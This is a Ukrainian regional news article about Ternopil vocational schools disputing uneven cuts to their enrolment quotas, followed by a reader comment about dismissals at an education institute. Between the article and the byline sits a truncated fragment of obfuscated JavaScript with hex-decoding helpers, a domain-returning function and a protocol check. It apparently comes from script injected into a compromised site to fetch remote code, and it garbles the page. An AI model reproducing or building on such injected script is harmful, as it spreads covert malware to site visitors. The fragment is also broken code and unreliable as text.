Ви знаходитесь: Головна / Новини / Представники колективів профтехучилищ Тернополя вимагають справедливого скорочення

Представники колективів профтехучилищ Тернополя вимагають справедливого скорочення

Питання профтехосвіти і досі гаряча тема. У березні гостро стояла проблема виділення коштів. Сьогодні профтехучилища фінансують з міського бюджету. А тому на місцях тепер і вирішують, яким буде обсяг регіонального замовлення, яке колись називалося державним.   У Тернополі представники навчальних закладів вважають,  кількість таких місць на підготовку робітничих кадрів, в училищах скорочують не рівномірно.

МИРОСЛАВА ГУСКА, голова трудового колективу ТВПУ «Сфери послуг та туризму»

«Попередньо був неправильний розподіл, тобто, в одному училищі, наприклад, було 30% скорочень, в іншому – 10. За кожною цифрою стоять живі люди, стоять скорочення, стоїть робота людей».

Мирослава Гуска каже, хочуть, аби набір по всіх училищах справедливо зменшили у відсотковому співвідношенні. Адже від цього залежить, ще й скорочення трудового колективу. Вирішити проблемне питання в міському управлінні освіти пообіцяли вже сьогодні.

ОЛЬГА ПОХИЛЯК, начальник Тернопільського міського управління освіти і науки

«Питання стояло про ті професії, які вже не актуальні на сьогоднішній день, і практично у кожному навчальному закладі ми не будемо регіонального замовлення створювати на оператора комп’ютерного набору. Вважаю, це на рівні загальноосвітньої середньої школи діти отримують відповідні знання. В основному, йшли на зустріч керівникам і колективам. Все те, що вони просили, всі будівельні професії: муляра, штукатура, столяра, кухаря, перукарів, те, що просили, ми залишили. В основному, це після 9-го класу».

Ольга Похиляк запевняє, дійшли згоди із представниками трудових колективів профтехучилищ. Кожен заклад погодився на, приблизно, двадцятивідсоткове скорочення регіонального замовлення. До слова, рішення про фінансування профтехосвіти з міського бюджету мають прийняти на найближчій сесії міської ради, що відбудеться у четвер, 16 червня.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "intb.te.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

1 коментар

  1. Ця влада що хоче, те й робить. У Тернопільському інституті післядипломної освіти директор Петровський за потурання голови обласної ради і задомовленістю з заступниками директора Мисиком та Шайнюком, а також з претендентами на керівні посади Вітенко та Когут без рішення голови обласної ради та погодження з профільною комісією з освіти самовільно змінює структуру інституту, звільняючи та переводячи некомпетентно на інші посади працівників інституту. Працівників інституту з погрозами заставляють підписувати безграмотно написані персональні повідомлення про звільнення через два місяці у випадку відмови таке повідомлення підписати. Цікаво, чи знає голова обласної ради про таку роботу Петровського? А якщо знає, то кому потрібна така влада, яка дозволяє таке беззаконня чинити?

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top